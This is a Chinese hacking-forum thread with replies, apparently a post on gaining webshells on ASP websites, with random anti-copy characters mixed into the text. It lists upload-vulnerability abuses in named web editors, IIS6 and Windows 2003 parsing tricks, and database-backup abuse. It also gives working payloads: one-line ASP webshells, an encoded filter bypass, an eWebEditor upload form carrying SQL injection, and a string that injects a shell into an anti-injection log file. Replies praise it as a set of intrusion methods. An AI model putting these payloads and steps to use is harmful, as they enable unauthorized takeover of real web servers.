返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
* M( k6 q5 @6 v" s* o, C
% S7 U  Z9 H2 ]' Z2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
" r* W& r7 v, b# M$ b0 X* b4 X* R+ W; s9 U  x9 W6 b
3.上传漏洞:* J8 C2 s4 v0 S0 J0 T

) O9 C* h, ^8 _3 {6 K3 a% e动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x009 j7 {6 M, f  J

" z& x& H) H/ \8 Q+ [逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
+ }2 y! d3 a5 ]6 [# k( y
" Z* V) a$ N0 p' B5 H雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp6 I% L+ ^: ]+ J. q; Y) E  A2 r5 i5 o2 C
然后在上传文件里面填要传的图片格式的ASP木马
+ {* A' y+ E/ d4 _就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
% K" q0 K3 b' q; t+ @, @0 r4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传9 d7 H! x& o* x
7 E6 B6 G: Z3 O4 e' T$ z% m
<html>
; t+ p9 f5 s6 o9 v<head>& D8 s. y- y, j6 \9 ]1 e
<title>ewebeditor upload.asp上传利用</title>
2 e. Y# B0 @, x- N& T</head>
& u# ~9 Z# B+ d. |<body>9 {- T" e& R0 G4 v
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
) _* f8 _& x' c( e<input type=file name=uploadfile size=100><br><br>
3 K; D9 ~2 z2 h% \, e# s$ X$ p<input type=submit value=Fuck>! {/ x' b: p4 {
</form>
" ~# {* g* A1 L  H8 d</body>
: F" \3 @* i& T8 ?7 \& ~  i</form>
( P2 U  n, f3 U0 g: F0 s</html>
) C6 q' p: a* c8 W* Y3 ?' Y  `( U; o% D) {
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问% L' m' ^* Z: q1 X3 {( v
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
8 |9 R) a. N. e8 e+ ^  b& K6 ]8 d
利用windows2003解析。建立zjq.asp的文件夹1 [- y0 E" }+ Q8 ]/ H2 m: y

9 `0 Q+ g  Z8 [  ?" X0 v: c1 I& f6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型# L! U: a/ _3 \# b
* z) j5 {7 d- N1 y
7.cuteeditor:类似ewebeditor
! B: @  k3 Q/ W* F+ f7 O0 D9 }( `
8.htmleditor:同上4 P: T& w5 i+ c8 p: q$ r6 n

2 v" v2 G  L0 o$ B9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
0 w2 m% }' H: m8 a
! {# T0 U* m9 Y<%execute request("value")%><%'<% loop <%:%>' M7 P0 A" b' y9 Y

( F' o- l6 ?0 h+ Z<%'<% loop <%:%><%execute request("value")%>6 i. S3 N7 r$ ?4 D( u4 @* o

- @1 u. p1 p' m  y& }2 n$ Y<%execute request("value")'<% loop <%:%>
4 r) H; Y0 z! x! M9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞( A! v/ U6 w7 e' e

7 e4 c" _  p# E3 U9 b4 _10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
( ], N( z6 h4 q6 C1 v0 e) S. D/ \( i. r9 l0 Z/ ^
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
/ n' U/ j5 B, D/ M" T$ r6 D; u# g2 I  m  _
解析漏洞得到webshell
1 D: g- E  D5 j! a0 ]# c
" t( f8 \) ^  p" y12.mssql差异备份,日志备份,前提需知道web路径$ v! j7 V1 L% Y3 R9 L3 |9 A
4 q8 j  ~* I! I& ~
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell/ d/ d; L& z3 Z1 m) U

' ]1 Z5 K& _$ M0 g# P! u% }/ t14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell/ ~& p% }1 s5 `

) ~& P9 Z7 X2 m; p15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
+ z; D' _0 G" R. l0 L# a9 X
" X/ E2 O* X0 @" _8 t" @  W4 e以上只是本人的一些拙见,并不完善,以后想到了再继续添加
# p$ l& I; g4 |% G不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 0 Q7 K2 r! c5 B: I9 d& D% p* T+ A
9 z/ k, z+ A& s- ^. u: E. m( e

2 M# x0 C6 X! E4 ~: z# X很好啊、基本的入侵方法都包含了3 X* J( \8 ^3 p2 b+ [# u/ R

, k: i& n: I6 j6 Q0 {& L+ a最好来个提权的帖子再。! F* K) T- X" Z1 r3 R' e
- k- ?- N( m2 Z* \6 j
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表